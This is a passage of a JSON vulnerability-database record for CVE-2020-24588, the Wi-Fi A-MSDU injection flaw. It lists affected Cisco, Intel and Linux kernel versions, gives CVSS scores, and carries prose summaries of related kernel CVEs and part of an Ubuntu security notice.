                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_dx80:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_55_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_55:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_55_dual_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_55_dual:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_dual_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70_dual:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_dual_g2_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70_dual_g2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_single_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70_single:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_70_single_g2_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_70_single_g2:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_kit_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_kit:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_room_kit_mini_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_room_kit_mini:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ac_8260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ac_8260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ac_8265_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ac_8265:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ac_9260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ac_9260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:ac_9560_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:ac_9560:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:killer_ac_1550_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:killer_ac_1550:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:killer_wi-fi_6_ax1650_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:killer_wi-fi_6_ax1650:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:killer_wi-fi_6e_ax1675_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:killer_wi-fi_6e_ax1675:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_3165_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_3165:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_3168_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_3168:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_8260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_8260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_8265_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_8265:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_9260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_9260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_9461_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_9461:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_9462_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_9462:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_ac_9560_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_ac_9560:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_wi-fi_6_ax200_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_wi-fi_6_ax200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_wi-fi_6_ax201_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_wi-fi_6_ax201:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_wi-fi_6e_ax210_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_wi-fi_6e_ax210:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:proset_wireless_7265_\\(rev_d\\)_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:proset_wireless_7265_\\(rev_d\\):-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:wi-fi_6_ax200_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:wi-fi_6_ax200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:intel:wi-fi_6_ax201_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:wi-fi_6_ax201:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.235",
                "versionStartIncluding": "4.14",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.193",
                "versionStartIncluding": "4.19",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.124",
                "versionStartIncluding": "5.4",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.42",
                "versionStartIncluding": "5.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.12.9",
                "versionStartIncluding": "5.12",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.271",
                "versionStartIncluding": "4.9.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.271",
                "versionStartIncluding": "4.4.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Mitsubishi Electric reported these vulnerabilities to CISA.",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-24588",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 5.5,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Adjacent Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.9,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2020-24588",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 2.1,
            "impactScore": 1.4,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Adjacent Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 3.5,
            "baseSeverity": "Low",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2020-24588",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-24588",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202105-633",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-24588",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24588"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006877"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-633"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24588"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The 802.11 standard that underpins Wi-Fi Protected Access (WPA, WPA2, and WPA3) and Wired Equivalent Privacy (WEP) doesn\u0027t require that the A-MSDU flag in the plaintext QoS header field is authenticated. Against devices that support receiving non-SSP A-MSDU frames (which is mandatory as part of 802.11n), an adversary can abuse this to inject arbitrary network packets. IEEE 802.11 The standard has vulnerabilities related to lack of certification for critical functions.Information may be tampered with. A flaw was found in the Linux kernels implementation of wifi fragmentation handling. An attacker with the ability to transmit within the wireless transmission range of an access point can abuse a flaw where previous contents of wifi fragments can be unintentionally transmitted to another device. (CVE-2020-24586)\nA flaw was found in the Linux kernel\u0027s WiFi implementation. An attacker within the wireless range can abuse a logic flaw in the WiFi implementation by reassembling packets from multiple fragments under different keys, treating them as valid. This flaw allows an malicious user to send a fragment under an incorrect key, treating them as a valid fragment under the new key. The highest threat from this vulnerability is to confidentiality. (CVE-2020-24587)\nA flaw was found in the Linux kernels wifi implementation. An attacker within wireless broadcast range can inject custom data into the wireless communication circumventing checks on the data.  This can cause the frame to pass checks and be considered a valid frame of a different type. (CVE-2020-24588)\nFrames used for authentication and key management between the AP and connected clients.  Some clients may take these redirected frames masquerading as control mechanisms from the AP. (CVE-2020-26139)\nA vulnerability was found in Linux kernel\u0027s WiFi implementation.  An attacker within wireless range can inject a control packet fragment where the kernel does not verify the Message Integrity Check (authenticity) of fragmented TKIP frames. (CVE-2020-26141)\nA flaw was found in ath10k_htt_rx_proc_rx_frag_ind_hl in drivers/net/wireless/ath/ath10k/htt_rx.c in the Linux kernel WiFi implementations, where it accepts a second (or subsequent) broadcast fragments even when sent in plaintext and then process them as full unfragmented frames. The highest threat from this vulnerability is to integrity. (CVE-2020-26145)\nA flaw was found in ieee80211_rx_h_defragment in net/mac80211/rx.c in the Linux Kernel\u0027s WiFi implementation. This vulnerability can be abused to inject packets or exfiltrate selected fragments when another device sends fragmented frames, and the WEP, CCMP, or GCMP data-confidentiality protocol is used. The highest threat from this vulnerability is to integrity. (CVE-2020-26147)\nA flaw was found in the Linux kernel in certs/blacklist.c, When signature entries for EFI_CERT_X509_GUID are contained in the Secure Boot Forbidden Signature Database, the entries are skipped. This can cause a security threat and breach system integrity, confidentiality and even lead to a denial of service problem. (CVE-2020-26541)\nA vulnerability was found in the bluez, where Passkey Entry protocol used in Secure Simple Pairing (SSP), Secure Connections (SC) and LE Secure Connections (LESC) of the Bluetooth Core Specification is vulnerable to an impersonation attack where an active attacker can impersonate the initiating device without any previous knowledge. (CVE-2020-26558)\nA flaw was found in the Linux kernel. Improper access control in BlueZ may allow an authenticated user to potentially enable information disclosure via adjacent access. The highest threat from this vulnerability is to data confidentiality and integrity. (CVE-2021-0129)\nA flaw was found in the Linux kernel\u0027s KVM implementation, where improper handing of the VM_IO|VM_PFNMAP VMAs in KVM bypasses RO checks and leads to pages being freed while still accessible by the VMM and guest. This flaw allows users who can start and control a VM to read/write random pages of memory, resulting in local privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, and system availability. (CVE-2021-22543)\nA flaw was found in the Linux kernel\u0027s handling of the removal of Bluetooth HCI controllers. This flaw allows an attacker with a local account to exploit a race condition, leading to corrupted memory and possible privilege escalation. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-32399)\nA use-after-free flaw was found in hci_send_acl in the bluetooth host controller interface (HCI) in Linux kernel, where a local attacker with an access rights could cause a denial of service problem on the system  The issue results from the object hchan, freed in hci_disconn_loglink_complete_evt, yet still used in other places. The highest threat from this vulnerability is to data integrity, confidentiality and system availability. (CVE-2021-33034)\nThe canbus filesystem in the Linux kernel contains an information leak of kernel memory to devices on the CAN bus network link layer.  An attacker with the ability to dump messages on the CAN bus is able to learn of uninitialized stack values by dumbing messages on the can bus. (CVE-2021-34693)\nAn out-of-bounds (OOB) memory access flaw was found in fs/f2fs/node.c in the f2fs module in the Linux kernel. A bounds check failure allows a local malicious user to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability. (CVE-2021-3506)\nA flaw double-free memory corruption in the Linux kernel HCI device initialization subsystem was found in the way user attach malicious HCI TTY Bluetooth device. A local user could use this flaw to crash the system. (CVE-2021-3564)\nA flaw use-after-free in function hci_sock_bound_ioctl() of the Linux kernel HCI subsystem was found in the way user calls ioct HCIUNBLOCKADDR or other way triggers race condition of the call hci_unregister_dev() together with one of the calls hci_sock_blacklist_add(), hci_sock_blacklist_del(), hci_get_conn_info(), hci_get_auth_info(). A privileged local user could use this flaw to crash the system or escalate their privileges on the system. (CVE-2021-3573)\nA flaw was found in the Linux kernels NFC implementation, A NULL pointer dereference and BUG leading to a denial of service can be triggered by a local unprivileged user causing a kernel panic. (CVE-2021-38208). ==========================================================================\nUbuntu Security Notice USN-4997-2\nJune 25, 2021\n\nlinux-kvm vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.04\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \nThis update provides the corresponding updates for the Linux KVM\nkernel for Ubuntu 21.04. \n\nNorbert Slusarek discovered a race condition in the CAN BCM networking\nprotocol of the Linux kernel leading to multiple use-after-free\nvulnerabilities. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-3609)\n\nPiotr Krysiuk discovered that the eBPF implementation in the Linux kernel\ndid not properly enforce limits for pointer operations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-33200)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly clear received fragments from memory in some situations. A\nphysically proximate attacker could possibly use this issue to inject\npackets or expose sensitive information. A physically proximate attacker\ncould possibly use this issue to decrypt fragments. (CVE-2020-24587)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled certain malformed frames. If a user were tricked into\nconnecting to a malicious server, a physically proximate attacker could use\nthis issue to inject packets. (CVE-2020-24588)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation did\nnot properly verify certain fragmented frames. A physically proximate\nattacker could possibly use this issue to inject or decrypt packets. A physically proximate\nattacker could use this issue to inject 